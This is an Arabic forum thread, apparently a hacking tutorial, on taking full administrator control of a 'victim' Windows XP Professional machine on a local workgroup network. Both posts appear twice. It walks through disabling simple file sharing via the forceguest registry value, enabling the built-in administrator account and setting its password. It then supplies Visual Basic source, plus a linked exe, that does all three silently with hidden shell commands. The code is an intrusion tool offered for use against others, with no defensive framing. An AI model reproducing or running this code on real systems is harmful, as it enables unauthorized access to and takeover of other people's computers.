الموضوع الكامل لاختراق الشبكات (الكودات اللازمة)
صفحة 1 من اصل 1
الموضوع الكامل لاختراق الشبكات (الكودات اللازمة)
من طرف صفاء الكربلائي 05.01.08 1:05
السلام عليكم ورحمة الله وبركاته.
اليوم جايبلكم موضوع جميل .وهو متطلبات (الاعدادات و والاكواد) اللازمة في اختراق شبكة محلية workgroup
الهدف :
اننا نصبح قادرين على ان ندخل على جهاز الضحية بصلاحيات admin
فيمكننا:
1.فتح c$ وباقي الاقسام والسواقات
2.الدخول ال manage الضحية
3.الدخول الى registry الضحية
بمعنى اخر التحكم بال microsoft managment console لدى الضحية
بعني كامل التحكم بالجهاز -بدون- استخدام برامج لفتح بورت معين ويتنصت عيله وبدون استخدام server و client
ساقوم بشرح التالي :
-كيف نقوم بالاعدادات المناسبة للاختلااق يدويا .
-صناعة برنامج على(VB) يقوم بعمل الاعدادات على جهاز الضحية . (يوجد البرنامج على شكل exe لمن لا يعرف vb)
-كيف نقوم بالتحكم بجهاز الضحية بعد عمل الاعدادات
ملاحظة:
العمل سيكون على انظمة win xp professional sp2 او sp1
لا تعمل الطريقة على نسخة ال
home edition
لنبدأ على بركة الله............................
((أولا)): ما هي الاعدادات اللازمة لنصبح قادرين على دخول جهاز الضحية (بطريقة شرعية)
هم ثلاث اشياء:
1.حذف تفعيل الخاصية use simple sharing
نلغي علامة الصح عن الخاصية use simple sharing
ويمكننا ان نلغيها عن طريق الريجستري
نعدل القيمة الى صفر
سؤال صغير قبل ان ننتقل للخطوة الثانية ..ما تفعل خاصية use simple sharing
لها عدة افعال ولكن الذي يلي يهمنا ان نلغيه هو انه عندنا نطلب جهاز عبر الشبكة مثلا
كود:\\newstargate\c$فيظهر لنا نافدة فيها اسم مستخدم guest (لونها رمادي لا نستطيع تعديل اسم المستخدم) ومكان لادخال كلمة السر
فعندما نلغي هذه الخاصية يصبح بامكاننا تغيير اسم المستخدم
2.تفعيل المستخدم administrator
يمكننا ذلك من الذهاب الى ال manage
عادة يكون المستخدم administrator فعال يعني ما نحتاج المرحلة ده ..ولكن من الممكن ان يكون الضيحة قد اوقفه
طريقة تفعيله من cmd
3.وضع كلمة سر للمستخدم administrator
من ال manage
ومن ثم pruceed واكتب الباسورد المطلوبة
او من cmd
تقوم بتبديل كلمة newstargate بالباسوورد المطلوبة
اما الان فقمنا بعمل الاعدادات المناسبة للدخول يدويا
لننتقل للمراحلة الاتية
((ثانيا)) : صناعة برنامج يقوم بوضع الاعدادات
هنا
((ثالثا)) : كيفية التحكم بجهاز الضحية
يتبع.............................................. ....
اليوم جايبلكم موضوع جميل .وهو متطلبات (الاعدادات و والاكواد) اللازمة في اختراق شبكة محلية workgroup
الهدف :
اننا نصبح قادرين على ان ندخل على جهاز الضحية بصلاحيات admin
فيمكننا:
1.فتح c$ وباقي الاقسام والسواقات
2.الدخول ال manage الضحية
3.الدخول الى registry الضحية
بمعنى اخر التحكم بال microsoft managment console لدى الضحية
بعني كامل التحكم بالجهاز -بدون- استخدام برامج لفتح بورت معين ويتنصت عيله وبدون استخدام server و client
ساقوم بشرح التالي :
-كيف نقوم بالاعدادات المناسبة للاختلااق يدويا .
-صناعة برنامج على(VB) يقوم بعمل الاعدادات على جهاز الضحية . (يوجد البرنامج على شكل exe لمن لا يعرف vb)
-كيف نقوم بالتحكم بجهاز الضحية بعد عمل الاعدادات
ملاحظة:
العمل سيكون على انظمة win xp professional sp2 او sp1
لا تعمل الطريقة على نسخة ال
home editionلنبدأ على بركة الله............................
((أولا)): ما هي الاعدادات اللازمة لنصبح قادرين على دخول جهاز الضحية (بطريقة شرعية)
هم ثلاث اشياء:
1.حذف تفعيل الخاصية use simple sharing
نلغي علامة الصح عن الخاصية use simple sharing
ويمكننا ان نلغيها عن طريق الريجستري
نعدل القيمة الى صفر
سؤال صغير قبل ان ننتقل للخطوة الثانية ..ما تفعل خاصية use simple sharing
لها عدة افعال ولكن الذي يلي يهمنا ان نلغيه هو انه عندنا نطلب جهاز عبر الشبكة مثلا
كود:\\newstargate\c$فيظهر لنا نافدة فيها اسم مستخدم guest (لونها رمادي لا نستطيع تعديل اسم المستخدم) ومكان لادخال كلمة السر
فعندما نلغي هذه الخاصية يصبح بامكاننا تغيير اسم المستخدم
2.تفعيل المستخدم administrator
يمكننا ذلك من الذهاب الى ال manage
عادة يكون المستخدم administrator فعال يعني ما نحتاج المرحلة ده ..ولكن من الممكن ان يكون الضيحة قد اوقفه
طريقة تفعيله من cmd
3.وضع كلمة سر للمستخدم administrator
من ال manage
ومن ثم pruceed واكتب الباسورد المطلوبة
او من cmd
تقوم بتبديل كلمة newstargate بالباسوورد المطلوبة
اما الان فقمنا بعمل الاعدادات المناسبة للدخول يدويا
لننتقل للمراحلة الاتية
((ثانيا)) : صناعة برنامج يقوم بوضع الاعدادات
هنا
((ثالثا)) : كيفية التحكم بجهاز الضحية
يتبع.............................................. ....
صفاء الكربلائي- :::شخصية هامة:::
-
عدد الرسائل : 567
العمر : 39
الهواية : احسب نجوم
المدينة : كربلاء المقدسة
البطاقة الشخصية
الشعارات والاهداف: -
رد: الموضوع الكامل لاختراق الشبكات (الكودات اللازمة)
من طرف صفاء الكربلائي 05.01.08 1:16
السلام عليكم ورحمة الله وبركاته ..
هذا الموضوع هو تتمة للموضوع
اما الان بعد ان قرانا الموضوع الاول وعرفنا ما هي الاعدادات المطلوب تغييرها
نريد ان نصنع برنامج يعمل هذه الاعدادت فقمت بصناعة module لعمل هذه الاعدادات .
ملاحظة :رابط البرنامج معمول exe لمن ليس لديه visual basic
كليك يمين وحفظ باسم
هنا
المهم لنفتح مشروع جديد .ونضيف module
ونض بع الاكواد التاليه:
كود:'( '''''''Settings maker''''''' )
'************************ Written By: New-Star-Gate ***********************
'************************Email: ghaith89@hotmail.com***********************
Option Explicit
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Enum regType
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_BINARY = 3
REG_DWORD = 4
REG_MULTI_SZ = 7
End Enum
Public Enum hiveKey
HKEY_CLASSES_ROOT = &H80000000 '(Windows 95,98,ME,NT,2000,XP)
HKEY_CURRENT_USER = &H80000001 '(Windows 95,98,ME,NT,2000,XP)
HKEY_LOCAL_MACHINE = &H80000002 '(Windows 95,98,ME,NT,2000,XP)
HKEY_USERS = &H80000003 '(Windows 95,98,ME,NT,2000,XP)
HKEY_CURRENT_CONFIG = &H80000005 '(Windows 95,98,ME,NT,2000,XP)
End Enum
Public Const MAIN_WRITE_KEY = "Software\Reg Test"
Public Sub SaveValue(hKey As hiveKey, strPath As String, strValue As String, rType As regType, varData As Variant)
Dim ret
Dim strData As String
Dim lngData As Long
On Error GoTo blank
If varData = "" Then Exit Sub
'Create a new key / Go to existing key
RegCreateKey hKey, strPath, ret
'Save data to the value property
Select Case rType
Case REG_DWORD 'Maximum length of 8 characters, saved in decimal
lngData = Mid(varData, 1, 8)
RegSetValueEx ret, strValue, 0, REG_DWORD, lngData, 4
End Select
'close the key
RegCloseKey ret
Exit Sub
blank:
End Sub
Public Sub maksett()
On Error Resume Next
Shell ("net user administrator /active:yes"), vbHide 'activate administrator if disabled
Shell ("net user administrator pego"), vbHide 'set the password "pego"
SaveValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Lsa", "forceguest", REG_DWORD, 0 '0 is the value to make the simple sharing unchecked
End Sub
لنشرح الكودات :
كود:Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Longلمعمليات اضافة key واغلاقه و التعديل على القيم في الريجستري
كود:Public Enum regType
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_BINARY = 3
REG_DWORD = 4
REG_MULTI_SZ = 7
End Enumانواع الdata في الريجستري
كود:Public Enum hiveKey
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_USER = &H80000001
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
HKEY_CURRENT_CONFIG = &H80000005
End Enumلرؤوس شجرة الريجستري .والتي سنستخدم منها HKEY_LOCAL_MACHINE
كود: Public Sub SaveValue(hKey As hiveKey, strPath As String, strValue As String, rType As regType, varData As Variant)
Dim ret
Dim strData As String
Dim lngData As Long
On Error GoTo blank
If varData = "" Then Exit Sub
'Create a new key / Go to existing key
RegCreateKey hKey, strPath, ret
'Save data to the value property
Select Case rType
Case REG_DWORD 'Maximum length of 8 characters, saved in decimal
lngData = Mid(varData, 1, 8)
RegSetValueEx ret, strValue, 0, REG_DWORD, lngData, 4
End Select
'close the key
RegCloseKey ret
Exit Sub
blank:
End Subهذا الكود لتعديل القيم
الكود العام لاستخدامه
كود:SaveValue [head of tree},"path","file name",file type,valueاما الكود
كود:Public Sub maksett()
On Error Resume Next
Shell ("net user administrator /active:yes"), vbHide 'activate administrator if disabled
Shell ("net user administrator pego"), vbHide 'set the password "pego"
SaveValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Lsa", "forceguest", REG_DWORD, 0 '0 is the value to make the simple sharing unchecked
End Subفهنا العمل المهم
السطر Shell ("net user administrator /active:yes"), vbHide
لتفعيل المستخدم administrator
السطر Shell ("net user administrator pego"), vbHide
لوضع كلمة سر للمستخدم administrator وهي pego
السطر الاخير SaveValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Lsa", "forceguest", REG_DWORD, 0
لالغاء خاصية use simple sharing التي تحدثنا عنها بالدرس السابق
وهذا مشرع لعينونكم مثال لاستخدام الكودات
كليك يمين وحفظ باسم
هنا
والسلام عليكم ورحمة الله وبركاته
هذا الموضوع هو تتمة للموضوع
اما الان بعد ان قرانا الموضوع الاول وعرفنا ما هي الاعدادات المطلوب تغييرها
نريد ان نصنع برنامج يعمل هذه الاعدادت فقمت بصناعة module لعمل هذه الاعدادات .
ملاحظة :رابط البرنامج معمول exe لمن ليس لديه visual basic
كليك يمين وحفظ باسم
هنا
المهم لنفتح مشروع جديد .ونضيف module
ونض بع الاكواد التاليه:
كود:'( '''''''Settings maker''''''' )
'************************ Written By: New-Star-Gate ***********************
'************************Email: ghaith89@hotmail.com***********************
Option Explicit
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Enum regType
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_BINARY = 3
REG_DWORD = 4
REG_MULTI_SZ = 7
End Enum
Public Enum hiveKey
HKEY_CLASSES_ROOT = &H80000000 '(Windows 95,98,ME,NT,2000,XP)
HKEY_CURRENT_USER = &H80000001 '(Windows 95,98,ME,NT,2000,XP)
HKEY_LOCAL_MACHINE = &H80000002 '(Windows 95,98,ME,NT,2000,XP)
HKEY_USERS = &H80000003 '(Windows 95,98,ME,NT,2000,XP)
HKEY_CURRENT_CONFIG = &H80000005 '(Windows 95,98,ME,NT,2000,XP)
End Enum
Public Const MAIN_WRITE_KEY = "Software\Reg Test"
Public Sub SaveValue(hKey As hiveKey, strPath As String, strValue As String, rType As regType, varData As Variant)
Dim ret
Dim strData As String
Dim lngData As Long
On Error GoTo blank
If varData = "" Then Exit Sub
'Create a new key / Go to existing key
RegCreateKey hKey, strPath, ret
'Save data to the value property
Select Case rType
Case REG_DWORD 'Maximum length of 8 characters, saved in decimal
lngData = Mid(varData, 1, 8)
RegSetValueEx ret, strValue, 0, REG_DWORD, lngData, 4
End Select
'close the key
RegCloseKey ret
Exit Sub
blank:
End Sub
Public Sub maksett()
On Error Resume Next
Shell ("net user administrator /active:yes"), vbHide 'activate administrator if disabled
Shell ("net user administrator pego"), vbHide 'set the password "pego"
SaveValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Lsa", "forceguest", REG_DWORD, 0 '0 is the value to make the simple sharing unchecked
End Sub
لنشرح الكودات :
كود:Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Longلمعمليات اضافة key واغلاقه و التعديل على القيم في الريجستري
كود:Public Enum regType
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_BINARY = 3
REG_DWORD = 4
REG_MULTI_SZ = 7
End Enumانواع الdata في الريجستري
كود:Public Enum hiveKey
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_USER = &H80000001
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
HKEY_CURRENT_CONFIG = &H80000005
End Enumلرؤوس شجرة الريجستري .والتي سنستخدم منها HKEY_LOCAL_MACHINE
كود: Public Sub SaveValue(hKey As hiveKey, strPath As String, strValue As String, rType As regType, varData As Variant)
Dim ret
Dim strData As String
Dim lngData As Long
On Error GoTo blank
If varData = "" Then Exit Sub
'Create a new key / Go to existing key
RegCreateKey hKey, strPath, ret
'Save data to the value property
Select Case rType
Case REG_DWORD 'Maximum length of 8 characters, saved in decimal
lngData = Mid(varData, 1, 8)
RegSetValueEx ret, strValue, 0, REG_DWORD, lngData, 4
End Select
'close the key
RegCloseKey ret
Exit Sub
blank:
End Subهذا الكود لتعديل القيم
الكود العام لاستخدامه
كود:SaveValue [head of tree},"path","file name",file type,valueاما الكود
كود:Public Sub maksett()
On Error Resume Next
Shell ("net user administrator /active:yes"), vbHide 'activate administrator if disabled
Shell ("net user administrator pego"), vbHide 'set the password "pego"
SaveValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Lsa", "forceguest", REG_DWORD, 0 '0 is the value to make the simple sharing unchecked
End Subفهنا العمل المهم
السطر Shell ("net user administrator /active:yes"), vbHide
لتفعيل المستخدم administrator
السطر Shell ("net user administrator pego"), vbHide
لوضع كلمة سر للمستخدم administrator وهي pego
السطر الاخير SaveValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Lsa", "forceguest", REG_DWORD, 0
لالغاء خاصية use simple sharing التي تحدثنا عنها بالدرس السابق
وهذا مشرع لعينونكم مثال لاستخدام الكودات
كليك يمين وحفظ باسم
هنا
والسلام عليكم ورحمة الله وبركاته
صفاء الكربلائي- :::شخصية هامة:::
-
عدد الرسائل : 567
العمر : 39
الهواية : احسب نجوم
المدينة : كربلاء المقدسة
البطاقة الشخصية
الشعارات والاهداف: -
مواضيع مماثلةصفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى